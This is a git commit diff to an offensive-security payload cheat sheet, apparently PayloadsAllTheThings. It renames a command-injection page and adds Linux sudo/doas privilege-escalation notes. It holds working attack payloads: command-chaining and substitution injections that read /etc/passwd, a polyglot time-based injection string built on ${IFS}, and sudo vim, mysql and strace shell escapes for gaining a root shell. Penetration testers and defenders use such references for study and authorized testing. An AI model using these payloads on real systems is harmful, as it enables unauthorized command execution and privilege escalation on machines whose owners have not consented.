Command injection renamed + sudo/doas privesc

This commit is contained in:
Swissky 2019-01-22 21:45:41 +01:00
parent 4db45a263a
commit e07a654080
4 changed files with 42 additions and 7 deletions

View File

@ -1,11 +1,11 @@
# Remote Commands Execution # Command Injection
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits ## Exploits
Normal Commands execution, execute the command and voila :p Normal command, execute the command and voila :p
```powershell ```powershell
cat /etc/passwd cat /etc/passwd
@ -17,7 +17,7 @@ sys:x:3:3:sys:/dev:/bin/sh
Commands execution by chaining commands Commands execution by chaining commands
```powershell ```bash
original_cmd_by_server; ls original_cmd_by_server; ls
original_cmd_by_server && ls original_cmd_by_server && ls
original_cmd_by_server | ls original_cmd_by_server | ls
@ -26,7 +26,7 @@ original_cmd_by_server || ls Only if the first cmd fail
Commands execution inside a command Commands execution inside a command
```powershell ```bash
original_cmd_by_server `cat /etc/passwd` original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd) original_cmd_by_server $(cat /etc/passwd)
``` ```
@ -167,6 +167,17 @@ Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca - dnsbin.zhack.ca
- pingb.in - pingb.in
## Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
## References ## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)

View File

@ -132,8 +132,31 @@ Edit capabilites
setcap cap_net_raw+p /bin/ping # add setcap cap_net_raw+p /bin/ping # add
``` ```
## SUDO
## GTFOBins Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
```bash
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
```
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
```bash
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
```
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```bash
permit nopass demo as root cmd vim
```
### GTFOBins
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
@ -143,6 +166,7 @@ The project collects legitimate functions of Unix binaries that can be abused to
> sudo mysql -e '\! /bin/sh' > sudo mysql -e '\! /bin/sh'
> strace -o /dev/null /bin/sh > strace -o /dev/null /bin/sh
## Groups ## Groups
### Docker ### Docker